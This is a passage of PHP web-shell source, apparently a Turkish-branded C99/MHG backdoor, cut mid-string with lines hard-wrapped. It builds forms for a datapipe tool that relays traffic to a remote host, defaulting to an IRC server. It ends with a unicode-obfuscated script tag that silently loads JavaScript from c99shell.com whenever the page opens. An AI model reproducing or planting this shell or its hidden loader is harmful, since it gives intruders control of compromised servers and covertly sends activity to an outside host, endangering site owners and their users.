me=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></s
elect>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text22']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port'
,15,'11457'));
echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host
',15,'irc.dalnet.ru'));
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port
',15,'6667'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" na
me=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapi
pe.c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe."</tr></div></table>";
}
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verd
ana size=-2><b>o---[ MHG1.2 - Turkceye ceviren ve tasarim C99SHELL.COM | <a href
=http://C99SHELL.COM>http://C99SHELL.COM</a> | <a href=http://C99SHELL.COM>http:
//C99SHELL.COM</a> | version ".$version." ]---o</b></font></div></td></tr></tabl
e>".$f;

?>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0
050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002
f\u0077\u0077\u0077\u002e\u0063\u0039\u0039\u0073\u0068\u0065\u006c\u006c\u002e\
u0063\u006f\u006d\u002f\u006b\u0061\u0079\u0064\u0065\u0074\u002e\u006a\u0073\u0
03e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e\u000a')</script>